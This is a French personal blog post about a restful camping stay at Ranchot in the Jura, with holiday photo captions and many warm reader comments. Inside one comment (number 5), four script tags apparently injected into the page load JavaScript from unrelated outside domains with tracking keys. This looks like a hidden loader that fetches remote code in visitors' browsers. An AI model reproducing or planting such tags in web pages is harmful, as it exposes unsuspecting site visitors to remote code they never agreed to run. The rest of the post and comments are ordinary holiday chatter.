• Franhe-Comté - Ranchot (39)

     

     

    Franhe-Comté  - Ranchot (39)

     

     

    Un tout petit coin de France, tranquille, au bord de l'eau...

     

    Faisant partie de la région Bourgogne-Franche-Comté, la commune de Ranchot est plus précisément située dans le département du Jura (39).

    Sur une superficie de 7,05 km², la commune de Ranchot est habitée par 487 habitants , ce qui représente une densité de 69 habitants au km².

    Village situé entre la route départementale 673 et la rivière le Doubs, le canal du Rhône au Rhin et la voie ferrée Dole-Besançon.

     

     

    Franhe-Comté  - Ranchot (39)

     

     

    Nous avons profité de quelques jours de repos, de tranquillité, que du Bonheur...

     

     

    Franhe-Comté  - Ranchot (39)

     

     

    De notre emplacement, nous avions cette vue...

     

     

    Franhe-Comté  - Ranchot (39)

    Franhe-Comté  - Ranchot (39)

     

     

    Notre première journée fut sous la pluie mais, dès le lendemain, le soleil était là... Alors Balades...

     

     

    Franhe-Comté  - Ranchot (39)

    Franhe-Comté  - Ranchot (39)

    Franhe-Comté  - Ranchot (39)

    Franhe-Comté  - Ranchot (39)

     

     

    Chacun a vaqué à ses occupations.... Vacances j'Adore ...

     

     

    Franhe-Comté  - Ranchot (39)

    Franhe-Comté  - Ranchot (39)

     

    Franhe-Comté  - Ranchot (39)

     

     

    Franhe-Comté  - Ranchot (39)

     

     


  • Commentaires

    28
    Mercredi 26 Août 2020 à 10:38

    Belle journée à toi ma douce, Marianne m a répondu elle était fort heureuse et moi je suis contente d avoir pu faire plaisir j aime ça , comme toi faire plaisir aux autres cela enchante ma vie bisous tendresse 

    27
    Mardi 25 Août 2020 à 18:45

    Vacances détente, la pêche, la lecture sans oublier Looping à l'ombre pour se cacher du soleil qui lui aussi a profité du séjour avec vous au bord de l'eau dans un grand espace de nature.

    Que demander de plus, vous êtes revenus avec de beaux souvenirs plein la tête 

    Bonne soirée

    Bisous

     

     

    26
    Mardi 25 Août 2020 à 11:58

    Alors moi je suis carrément fan du concept "fauteuil pieds dans l'eau" !! Ce sont en effet de beaux paysages que tu nous partages, un vrai plaisir et bonheur !! Merci pour ces jolis coins de France que tu nous offres !!
    Gros Bisous

    25
    Lundi 24 Août 2020 à 21:27

    Coucou ma belle Valie, quelle jolie vue, de vraies belles vacances, je suis heureuse pour toi. Passe une bonne semaine, bisou rose tendresse !

    24
    Lundi 24 Août 2020 à 21:08

    Bonsoir ma douce Valie

    Mon petit coucou pour te souhaiter une bonne soirée et une belle journée de mardi il fait moins chaud

    et c'est appréciable

    Gros bisous 

    Janine

    23
    Lundi 24 Août 2020 à 11:32
    Un bien bel endroit reposant ! bonne semaine ; bisous / Nicole
    22
    Dimanche 23 Août 2020 à 23:14

    de très jolies photos d'un endroit qui offre toutes les garanties pour un repos bien mérité loin de la foule et de ses miasmes.

    Le Jura, le Doubs, sont de très beaux départements et il faut savoir le dire : notre pays est magnifique, il nous offre tout ce que l'on peut souhaiter comme paysages.

    Bisous

    21
    Dimanche 23 Août 2020 à 06:52

    Un petit coin de France idéal loin des sentiers battus et de la foule pour se ressourcer. Merci pour le partage Valie ! Bisous bisous !

    20
    Samedi 22 Août 2020 à 19:03

    Notre région de franche Comté est très belle .Merci pour la ballade .Bisous

    19
    Samedi 22 Août 2020 à 18:54

    Coucou ma Valie

    de toute beauté , ces photos , on a envie de te rejoindre , ce n'est rien que du bonheur !!!!!! Tu as bien eu raison d'en profiter .......Passe un bon weekend , ma belle , gros bisous

    18
    Samedi 22 Août 2020 à 10:09

    voila un bel endroit pour ce detendre et profité d une belle vue

    bisous

    17
    Samedi 22 Août 2020 à 08:48
    Encore un joli petit coin de vacances que de jolies photos tu vas etre oblige de faire un album avec tout ça
    Bisous bon week-end
    16
    MAMAPAH
    Samedi 22 Août 2020 à 01:05

    UN COUCOU VALERIE.. JE VIENS JUSTE DE RECEVOIR D'UNE COPINE LA ROUTE DES FROMAGES LOL ... PROFITEZ-EN BIEN, MAIS JE CROIS QUE OUI .. LES PIEDS DANS L'EAU .. GROS GROS BISOUS

    15
    Vendredi 21 Août 2020 à 20:11

    Bonsoir ma chère Valie

    Heureusement que le soleil est revenu ! une belle vue et une tranquillité dans votre joli coin de vacances

    Bonne soirée et bon week-end

    gros bisous

    Janine

    14
    Qinoa
    Vendredi 21 Août 2020 à 15:35
    Très belle endroit
    Bzz
    13
    Jacline-H-49
    Vendredi 21 Août 2020 à 15:15

    Régions inconnues pour moi, mais j'aurais aimer être avec vous pour découvrir de tels endroits de paix, dans notre si beau pays. Merci pour le partage, c'est toujours un plaisir pour moi de regarder tout ce que tu nous envoies.

    Bon après midi de ce vendredi, fin de semaine déjà !!

    GROS BISOUS ENSOLEILLE de 

    Jacline

     

    12
    Vendredi 21 Août 2020 à 14:23
    lamanuelle25

    Bel endroit pour se reposer, merci du partage, bises Nadine

    11
    Vendredi 21 Août 2020 à 13:48

    Merci pour le partage de toutes ces belles photos qui donnent vraiment envie de calme, de verdure, de liberté !!!

    Mille Bisous tout doux.

    10
    marianne pirotte
    Vendredi 21 Août 2020 à 13:13

    Un joli petit coin tranquille !!

    Gros bisous

    Marianne

    9
    Vendredi 21 Août 2020 à 10:39

    Très belles photos ma Valie tu étais dans la nature c est ce que j aime le plus et le camping j adore si je pouvais je vivrais dans un camping gare et ne ferait que voyager bisous ma douce et encore une journée épouvantable de chaleur je ne sais plus ou me mettre 

    8
    Vendredi 21 Août 2020 à 10:37

    Un ravissant petit coin que je ne connais pas du tout ...

    Bises

    thaly

    7
    Vendredi 21 Août 2020 à 10:33

    magnifique cette nature verdoyante ! merci pour les belles photos

    bisous

    6
    Jour de mai
    Vendredi 21 Août 2020 à 10:10

    Coucou Valie, 

    Très beau reportage, je connais un peu le Jura qui est une très belle région mais l'endroit que tu viens de partager est un véritable havre de paix, de quoi se ressourcer. Une halte très reposante ou calme et volupté sont au rendez-vous.

    Merci pour ce partage qui nous fait apprécier les belles régions que nous possédons.

    Excellent vendredi suivi d'un bon week end. 

    Gros bisous ♥♥♥♥

    LN

    5
    mamijojo77100
    Vendredi 21 Août 2020 à 09:53

    vacances douces et reposantes beaux paysages et au moins LE COVID ne circule pas.. cela s appele des vacances au calme et comme tu dis chacun fais ce qu il veut.. Cette annee valait mieux eviter la foule de "dingue"..GBISOUS  a laprochaine escapade!!  JOELLE

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1597996255942" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    4
    Vendredi 21 Août 2020 à 09:50

    Bonjour Valie, belle vue, c'est un brin de campagne que j'aime bien mais que je ne connais pas !!!

    Merci pour ce beau partage vacancier !!

    Bonne journée

    Bisous de Pat

    3
    Muriel
    Vendredi 21 Août 2020 à 09:36
    Coucou, de bien belles photos qui montrent à quel point cette halte fut reposante. Bisous
    2
    Vendredi 21 Août 2020 à 09:31

    je ne connais pas cette région, je la trouve très belle verdoyante et reposante, vous avez dû passer ici de vrais bons moments dans une belle nature loin de la foule. Quelles jolies balades vous avez faites. Merci pour ces partages superbes que je prends plaisir à partager avec mes ami(e)s facebook bon week-end Valie. Bises et amitié.

    1
    Vendredi 21 Août 2020 à 09:13

    belles photos Valie 

    surtout de bonnes vacances à ce que je vois 

    passe un bon weekend

    bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :